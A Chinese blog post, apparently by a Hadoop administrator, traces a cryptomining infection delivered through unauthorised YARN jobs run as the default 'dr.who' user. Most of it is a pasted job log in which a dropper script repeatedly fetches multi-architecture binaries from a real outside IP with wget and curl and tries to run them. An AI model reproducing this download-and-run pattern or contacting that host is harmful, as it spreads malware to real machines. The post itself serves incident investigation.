继续深挖挖矿病毒solr中毒途径

原创 已于 2023-03-21 20:24:57 修改 · 672 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#solr

于 2023-02-23 11:37:28 首次发布

项目场景:

提示:继2023年02年20号早上发现病毒并清除后,之前的文章请参考:清除挖矿病毒solr记录_冰帆<的博客-优快云博客

通过grafana 查看hadoop集群网卡流量异常,根据经验,应该有yarn任务执行导致,查看hadoop集群任务界面,发现有异常的任务,dr.who用户执行yarn 任务

问题描述

提示:挖矿病毒导致cpu异常:

例如:一般情况下,我们的集群任务是特定用户,比如hadoop,hue,hive,aliyun等,而dr.who是hadoop 集群的默认用户,所以,直接先使用命令杀掉

yarn application -kill application_1667455867992_91447
查看日志:

yarn logs -applicationId application_1667455867992_91447

竟然没有任何日志

原因分析:

提示:发现这个dr.who用户,在2023年02月17日,2023年02月21日都有执行相同的任务

查看 grafana node_exporter挂掉的节点近七天的cpu曲线:

挂掉的时间与yarn  的dr.who用户执行任务的时间吻合

启动的时间与清理掉solr病毒时间吻合。

而查看yarn 任务的task节点

有三台被植入了solr病毒,三台node节点挂掉。

 

解决方案:

提示:目前还没找到这个用户执行的yarn脚本。

例如:持续观察一段时间,看看是否还会中毒。

有相同经历的小伙伴,也可以告知下这个yarn任务是怎么执行的?欢迎一起分享讨论。

后记:

3月21号

今天又发现dw.who 用户的yarn 任务,导致网卡流量暴涨。

 任务执行日志如下

Application application_1678325801596_9288 failed 4 times due to AM Container for appattempt_1678325801596_9288_000004 exited with exitCode: 1 due to: Exception from container-launch.
Container id: container_1678325801596_9288_04_000001
Exit code: 1
Exception message: --2023-03-21 09:47:55-- http://199.195.250.172/jack5tr.sh
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2089 (2.0K) [application/x-sh]
Saving to: ‘jack5tr.sh’
0K .. 100% 2.70K=0.8s
2023-03-21 09:47:56 (2.70 KB/s) - ‘jack5tr.sh’ saved [2089/2089]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 2089 100 2089 0 0 4621 0 --:--:-- --:--:-- --:--:-- 4621
--2023-03-21 09:47:57-- http://199.195.250.172/x86
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 51504 (50K)
Saving to: ‘x86’
0K .......... .......... .......... .......... .......... 99% 37.3K 0s
50K 100% 566G=1.3s
2023-03-21 09:47:59 (37.5 KB/s) - ‘x86’ saved [51504/51504]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
37 51504 37 19250 0 0 20056 0 0:00:02 --:--:-- 0:00:02 20052
100 51504 100 51504 0 0 27391 0 0:00:01 0:00:01 --:--:-- 27381
100 51504 100 51504 0 0 27388 0 0:00:01 0:00:01 --:--:-- 27381
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
mv: cannot stat ‘\025\005\b./RUN’: No such file or directory
chmod: cannot access ‘\004\b\001bin/watchdog’: No such file or directory
--2023-03-21 09:48:01-- http://199.195.250.172/mips
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 77236 (75K)
Saving to: ‘mips’
0K .......... .......... .......... .......... .......... 66% 28.4K 1s
50K .......... .......... ..... 100% 22.5K=2.9s
2023-03-21 09:48:04 (26.1 KB/s) - ‘mips’ saved [77236/77236]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
14 77236 14 11057 0 0 16028 0 0:00:04 --:--:-- 0:00:04 16024
60 77236 60 46897 0 0 29300 0 0:00:02 0:00:01 0:00:01 29292
100 77236 100 77236 0 0 31062 0 0:00:02 0:00:02 --:--:-- 31068
jack5tr.sh: line 3: RUN: Text file busy
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
mkdir: cannot create directory ‘bin’: File exists
chmod: cannot access ‘\005\b\356\364\004\b\001bin/busybox’: No such file or directory
--2023-03-21 09:48:07-- http://199.195.250.172/arc
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2023-03-21 09:48:07 ERROR 404: Not Found.
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 201 100 201 0 0 435 0 --:--:-- --:--:-- --:--:-- 436
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
./RUN: line 1: syntax error near unexpected token `newline'
./RUN: line 1: `<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">'
--2023-03-21 09:48:07-- http://199.195.250.172/x86_64
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 59200 (58K)
Saving to: ‘x86_64’
0K .......... .......... .......... .......... .......... 86% 38.6K 0s
50K ....... 100% 38.4K=1.5s
2023-03-21 09:48:09 (38.6 KB/s) - ‘x86_64’ saved [59200/59200]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
48 59200 48 28466 0 0 26073 0 0:00:02 0:00:01 0:00:01 26067
75 59200 75 44850 0 0 16385 0 0:00:03 0:00:02 0:00:01 16380
75 59200 75 44850 0 0 11996 0 0:00:04 0:00:03 0:00:01 11995
100 59200 100 59200 0 0 15008 0 0:00:03 0:00:03 --:--:-- 15006
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
mkdir: cannot create directory ‘bin’: File exists
sh: ��bin/busybox: No such file or directory
chmod: cannot access ‘bin/busybox’: No such file or directory
--2023-03-21 09:48:13-- http://199.195.250.172/mpsl
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 80644 (79K)
Saving to: ‘mpsl’
0K .......... .......... .......... .......... .......... 63% 37.3K 1s
50K .......... .......... ........ 100% 17.8K=3.0s
2023-03-21 09:48:17 (26.7 KB/s) - ‘mpsl’ saved [80644/80644]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
39 80644 39 31537 0 0 28795 0 0:00:02 0:00:01 0:00:01 28827
58 80644 58 46897 0 0 27674 0 0:00:02 0:00:01 0:00:01 27667
74 80644 74 60209 0 0 22441 0 0:00:03 0:00:02 0:00:01 22440
92 80644 92 74545 0 0 19687 0 0:00:04 0:00:03 0:00:01 19684
100 80644 100 80644 0 0 19090 0 0:00:04 0:00:04 --:--:-- 19091
jack5tr.sh: line 6: RUN: Text file busy
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
--2023-03-21 09:48:21-- http://199.195.250.172/arm
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 62780 (61K)
Saving to: ‘arm’
0K .......... .......... .......... .......... .......... 81% 41.7K 0s
50K .......... . 100% 7.35K=2.7s
2023-03-21 09:48:24 (22.4 KB/s) - ‘arm’ saved [62780/62780]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
43 62780 43 27442 0 0 19981 0 0:00:03 0:00:01 0:00:02 19972
96 62780 96 60210 0 0 23403 0 0:00:02 0:00:02 --:--:-- 23400
100 62780 100 62780 0 0 22877 0 0:00:02 0:00:02 --:--:-- 22879
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 7: ./RUN: cannot execute binary file
--2023-03-21 09:48:27-- http://199.195.250.172/arm5
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36432 (36K)
Saving to: ‘arm5’
0K .......... .......... .......... ..... 100% 24.0K=1.5s
2023-03-21 09:48:29 (24.0 KB/s) - ‘arm5’ saved [36432/36432]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
2 36432 2 818 0 0 1551 0 0:00:23 --:--:-- 0:00:23 1552
83 36432 83 30514 0 0 16098 0 0:00:02 0:00:01 0:00:01 16093
97 36432 97 35634 0 0 12944 0 0:00:02 0:00:02 --:--:-- 12943
100 36432 100 36432 0 0 12261 0 0:00:02 0:00:02 --:--:-- 12258
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 8: ./RUN: cannot execute binary file
--2023-03-21 09:48:32-- http://199.195.250.172/arm6
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75064 (73K)
Saving to: ‘arm6’
0K .......... .......... .......... .......... .......... 68% 37.7K 1s
50K .......... .......... ... 100% 51.2K=1.8s
2023-03-21 09:48:34 (41.1 KB/s) - ‘arm6’ saved [75064/75064]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
46 75064 46 34609 0 0 17544 0 0:00:04 0:00:01 0:00:03 17541
73 75064 73 55089 0 0 25092 0 0:00:02 0:00:02 --:--:-- 25086
100 75064 100 75064 0 0 23957 0 0:00:03 0:00:03 --:--:-- 23959
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 9: ./RUN: cannot execute binary file
--2023-03-21 09:48:37-- http://199.195.250.172/arm7
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 146122 (143K)
Saving to: ‘arm7’
0K .......... .......... .......... .......... .......... 35% 25.3K 4s
50K .......... .......... .......... .......... .......... 70% 16.6K 2s
100K .......... .......... .......... .......... .. 100% 13.9K=8.1s
2023-03-21 09:48:46 (17.7 KB/s) - ‘arm7’ saved [146122/146122]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
11 142k 11 16176 0 0 21242 0 0:00:06 --:--:-- 0:00:06 21228
29 142k 29 42800 0 0 24278 0 0:00:06 0:00:01 0:00:05 24276
48 142k 48 71472 0 0 26408 0 0:00:05 0:00:02 0:00:03 26402
59 142k 59 86832 0 0 24652 0 0:00:05 0:00:03 0:00:02 24654
79 142k 79 112k 0 0 25022 0 0:00:05 0:00:04 0:00:01 25022
92 142k 92 131k 0 0 24350 0 0:00:06 0:00:05 0:00:01 24845
100 142k 100 142k 0 0 24323 0 0:00:06 0:00:06 --:--:-- 24345
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 10: ./RUN: cannot execute binary file
--2023-03-21 09:48:52-- http://199.195.250.172/ppc
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 58916 (58K)
Saving to: ‘ppc’
0K .......... .......... .......... .......... .......... 86% 31.4K 0s
50K ....... 100% 35.5K=1.8s
2023-03-21 09:48:54 (31.9 KB/s) - ‘ppc’ saved [58916/58916]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0
83 58916 83 48946 0 0 21051 0 0:00:02 0:00:02 --:--:-- 21052
100 58916 100 58916 0 0 21287 0 0:00:02 0:00:02 --:--:-- 21284
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 11: ./RUN: cannot execute binary file
--2023-03-21 09:48:57-- http://199.195.250.172/spc
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 63096 (62K)
Saving to: ‘spc’
0K .......... .......... .......... .......... .......... 81% 27.7K 0s
50K .......... . 100% 52.4K=2.0s
2023-03-21 09:49:00 (30.4 KB/s) - ‘spc’ saved [63096/63096]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
45 63096 45 28466 0 0 31962 0 0:00:01 --:--:-- 0:00:01 31948
59 63096 59 37682 0 0 17837 0 0:00:03 0:00:02 0:00:01 17841
100 63096 100 63096 0 0 27273 0 0:00:02 0:00:02 --:--:-- 27278
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 12: ./RUN: cannot execute binary file
--2023-03-21 09:49:02-- http://199.195.250.172/m68k
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 65384 (64K)
Saving to: ‘m68k’
0K .......... .......... .......... .......... .......... 78% 31.5K 0s
50K .......... ... 100% 20.5K=2.3s
2023-03-21 09:49:05 (28.2 KB/s) - ‘m68k’ saved [65384/65384]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
34 65384 34 22322 0 0 23309 0 0:00:02 --:--:-- 0:00:02 23300
65 65384 65 42802 0 0 23377 0 0:00:02 0:00:01 0:00:01 23376
100 65384 100 65384 0 0 24160 0 0:00:02 0:00:02 --:--:-- 24171
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 13: ./RUN: cannot execute binary file
--2023-03-21 09:49:07-- http://199.195.250.172/sh4
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 54644 (53K)
Saving to: ‘sh4’
0K .......... .......... .......... .......... .......... 93% 15.3K 0s
50K ... 100% 15.4K=3.5s
2023-03-21 09:49:11 (15.3 KB/s) - ‘sh4’ saved [54644/54644]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
70 54644 70 38706 0 0 27377 0 0:00:01 0:00:01 --:--:-- 27373
100 54644 100 54644 0 0 26424 0 0:00:02 0:00:02 --:--:-- 26436
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 14: ./RUN: cannot execute binary file
/bin/bash: tftp: command not found
--2023-03-21 09:49:13-- http://199.195.250.172/x86
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 51504 (50K)
Saving to: ‘x86.1’
0K .......... .......... .......... .......... .......... 99% 17.1K 0s
50K 100% 566G=2.9s
2023-03-21 09:49:17 (17.2 KB/s) - ‘x86.1’ saved [51504/51504]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
13 51504 13 6962 0 0 16047 0 0:00:03 --:--:-- 0:00:03 16041
75 51504 75 38706 0 0 27191 0 0:00:01 0:00:01 --:--:-- 27181
100 51504 100 51504 0 0 24239 0 0:00:02 0:00:02 --:--:-- 24248
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
mkdir: cannot create directory ‘bin’: File exists
chmod: cannot access ‘\005\b\356\364\004\b\001bin/systemd’: No such file or directory
--2023-03-21 09:49:19-- http://199.195.250.172/mips
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 77236 (75K)
Saving to: ‘mips.1’
0K .......... .......... .......... .......... .......... 66% 21.7K 1s
50K .......... .......... ..... 100% 23.0K=3.4s
2023-03-21 09:49:23 (22.1 KB/s) - ‘mips.1’ saved [77236/77236]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
9 77236 9 6961 0 0 15952 0 0:00:04 --:--:-- 0:00:04 15929
56 77236 56 43825 0 0 32742 0 0:00:02 0:00:01 0:00:01 32729
100 77236 100 77236 0 0 34647 0 0:00:02 0:00:02 --:--:-- 34650
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 3: ./RUN: cannot execute binary file
--2023-03-21 09:49:25-- http://199.195.250.172/arc
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2023-03-21 09:49:26 ERROR 404: Not Found.
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 201 100 201 0 0 414 0 --:--:-- --:--:-- --:--:-- 415
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
./RUN: line 1: syntax error near unexpected token `newline'
./RUN: line 1: `<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">'
--2023-03-21 09:49:26-- http://199.195.250.172/x86_64
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 59200 (58K)
Saving to: ‘x86_64.1’
0K .......... .......... .......... .......... .......... 86% 43.6K 0s
50K ....... 100% 32.8K=1.4s
2023-03-21 09:49:28 (41.8 KB/s) - ‘x86_64.1’ saved [59200/59200]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
11 59200 11 6962 0 0 14859 0 0:00:03 --:--:-- 0:00:03 14844
29 59200 29 17202 0 0 8784 0 0:00:06 0:00:01 0:00:05 8781
75 59200 75 44850 0 0 16392 0 0:00:03 0:00:02 0:00:01 16392
100 59200 100 59200 0 0 14611 0 0:00:04 0:00:04 --:--:-- 14613
100 59200 100 59200 0 0 14610 0 0:00:04 0:00:04 --:--:-- 14613
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
mkdir: cannot create directory ‘bin’: File exists
sh: ���bin/busybox: No such file or directory
chmod: cannot access ‘bin/busybox’: No such file or directory
--2023-03-21 09:49:32-- http://199.195.250.172/mpsl
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 80644 (79K)
Saving to: ‘mpsl.1’
0K .......... .......... .......... .......... .......... 63% 23.4K 1s
50K .......... .......... ........ 100% 17.1K=3.8s
2023-03-21 09:49:38 (20.6 KB/s) - ‘mpsl.1’ saved [80644/80644]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
25 80644 25 20273 0 0 21982 0 0:00:03 --:--:-- 0:00:03 21964
59 80644 59 47921 0 0 23790 0 0:00:03 0:00:02 0:00:01 23793
89 80644 89 72497 0 0 24951 0 0:00:03 0:00:02 0:00:01 24947
100 80644 100 80644 0 0 22615 0 0:00:03 0:00:03 --:--:-- 22621
jack5tr.sh: line 6: RUN: Text file busy
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
--2023-03-21 09:49:41-- http://199.195.250.172/arm
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 62780 (61K)
Saving to: ‘arm.1’
0K .......... .......... .......... .......... .......... 81% 37.7K 0s
50K .......... . 100% 25.5K=1.8s
2023-03-21 09:49:44 (34.6 KB/s) - ‘arm.1’ saved [62780/62780]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
30 62780 30 19250 0 0 21502 0 0:00:02 --:--:-- 0:00:02 21484
81 62780 81 50994 0 0 25554 0 0:00:02 0:00:01 0:00:01 25548
100 62780 100 62780 0 0 25524 0 0:00:02 0:00:02 --:--:-- 25530
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 7: ./RUN: cannot execute binary file
--2023-03-21 09:49:46-- http://199.195.250.172/arm5
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36432 (36K)
Saving to: ‘arm5.1’
0K .......... .......... .......... ..... 100% 32.9K=1.1s
2023-03-21 09:49:48 (32.9 KB/s) - ‘arm5.1’ saved [36432/36432]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
38 36432 38 14130 0 0 15278 0 0:00:02 --:--:-- 0:00:02 15275
100 36432 100 36432 0 0 18074 0 0:00:02 0:00:02 --:--:-- 18080
100 36432 100 36432 0 0 18072 0 0:00:02 0:00:02 --:--:-- 18080
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 8: ./RUN: cannot execute binary file
--2023-03-21 09:49:50-- http://199.195.250.172/arm6
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75064 (73K)
Saving to: ‘arm6.1’
0K .......... .......... .......... .......... .......... 68% 27.8K 1s
50K .......... .......... ... 100% 14.1K=3.4s
2023-03-21 09:49:54 (21.3 KB/s) - ‘arm6.1’ saved [75064/75064]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
21 75064 21 16177 0 0 17580 0 0:00:04 --:--:-- 0:00:04 17564
65 75064 65 48945 0 0 24056 0 0:00:03 0:00:02 0:00:01 24063
89 75064 89 67377 0 0 20913 0 0:00:03 0:00:03 --:--:-- 20918
100 75064 100 75064 0 0 21980 0 0:00:03 0:00:03 --:--:-- 21987
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 9: ./RUN: cannot execute binary file
--2023-03-21 09:49:57-- http://199.195.250.172/arm7
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 146122 (143K)
Saving to: ‘arm7.1’
0K .......... .......... .......... .......... .......... 35% 28.2K 3s
50K .......... .......... .......... .......... .......... 70% 24.9K 2s
100K .......... .......... .......... .......... .. 100% 36.5K=4.9s
2023-03-21 09:50:02 (28.8 KB/s) - ‘arm7.1’ saved [146122/146122]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
1 142k 1 2864 0 0 1984 0 0:01:13 0:00:01 0:01:12 1983
32 142k 32 46896 0 0 22865 0 0:00:06 0:00:02 0:00:04 22864
55 142k 55 80688 0 0 25198 0 0:00:05 0:00:03 0:00:02 25199
81 142k 81 115k 0 0 27269 0 0:00:05 0:00:04 0:00:01 27265
92 142k 92 131k 0 0 25621 0 0:00:05 0:00:05 --:--:-- 26719
100 142k 100 142k 0 0 24699 0 0:00:05 0:00:05 --:--:-- 32034
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 10: ./RUN: cannot execute binary file
--2023-03-21 09:50:08-- http://199.195.250.172/ppc
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 58916 (58K)
Saving to: ‘ppc.1’
0K .......... .......... .......... .......... .......... 86% 32.6K 0s
50K ....... 100% 55.7M=1.5s
2023-03-21 09:50:10 (37.5 KB/s) - ‘ppc.1’ saved [58916/58916]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
55 58916 55 32562 0 0 26251 0 0:00:02 0:00:01 0:00:01 26238
100 58916 100 58916 0 0 27582 0 0:00:02 0:00:02 --:--:-- 27582
